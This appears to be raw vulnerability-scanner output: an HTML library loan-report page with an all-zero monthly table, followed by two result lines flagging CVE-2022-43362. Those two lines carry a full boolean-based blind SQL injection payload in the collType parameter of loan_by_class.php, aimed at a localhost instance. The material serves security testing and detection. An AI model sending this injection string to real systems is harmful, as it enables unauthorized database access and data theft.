<table class="s-table table table-sm table-bordered"><tr><th class="dataListHeaderPrinted">Classification</th><th class="dataListHeaderPrinted">Jan</th><th class="dataListHeaderPrinted">Feb</th><th class="dataListHeaderPrinted">Mar</th><th class="dataListHeaderPrinted">Apr</th><th class="dataListHeaderPrinted">May</th><th class="dataListHeaderPrinted">Jun</th><th class="dataListHeaderPrinted">Jul</th><th class="dataListHeaderPrinted">Aug</th><th class="dataListHeaderPrinted">Sep</th><th class="dataListHeaderPrinted">Oct</th><th class="dataListHeaderPrinted">Nov</th><th class="dataListHeaderPrinted">Dec</th></tr><tr><td><strong>bbbb00</strong></td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb00</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb10</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb20</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb30</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb40</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb50</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb60</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb70</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><tr><td>bbbb80</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>
0</td><td>0</td><td>0</td><tr><td>bbbb90</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td><td>0</td></table></div>
<div class="loader"></div>
<!-- block if we inside iframe -->
<script type="text/javascript">
    // if we are inside iframe
    jQuery(document).ready(function () {
          });
</script>
</body>
</html>
[CVE-2022-43362:word-1] [http] [high] http://localhost:8089/bulian/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb&membershipType=a&collType=aaaa%27%20AND%203045=(SELECT%20(CASE%20WHEN%20(3045=3045)%20THEN%203045%20ELSE%20(SELECT%203726%20UNION%20SELECT%205145)%20END))--%20-
[CVE-2022-43362:status-2] [http] [high] http://localhost:8089/bulian/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb&membershipType=a&collType=aaaa%27%20AND%203045=(SELECT%20(CASE%20WHEN%20(3045=3045)%20THEN%203045%20ELSE%20(SELECT%203726%20UNION%20SELECT%205145)%20END))--%20-
